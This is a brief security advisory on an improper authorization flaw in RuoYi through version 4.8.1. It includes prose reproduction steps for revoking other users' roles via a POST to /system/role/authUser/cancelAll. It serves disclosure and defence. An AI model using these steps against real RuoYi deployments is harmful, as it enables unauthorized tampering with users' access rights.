yangzongzhuan RuoYi Role Handler Improper Authorization Vulnerability

A vulnerability allowing improper authorization has been identified in yangzongzhuan RuoYi versions through 4.8.1. The issue arises in the Role Handler component, specifically within the file /system/role/authUser/cancelAll. Manipulating the roleId or userIds arguments can bypass authorization checks, allowing unauthorized actions to be performed. This vulnerability can be exploited remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows for improper authorization, enabling unauthorized users to revoke roles from other users.

Reproduction

To reproduce this vulnerability, log into the system as an authenticated user. Capture a valid session cookie from any request. Then, send a POST request to /system/role/authUser/cancelAll, including the roleId of the role to be revoked and the userIds of the users from whom the role will be removed. The specified role will be successfully revoked from the target users, demonstrating the authorization bypass.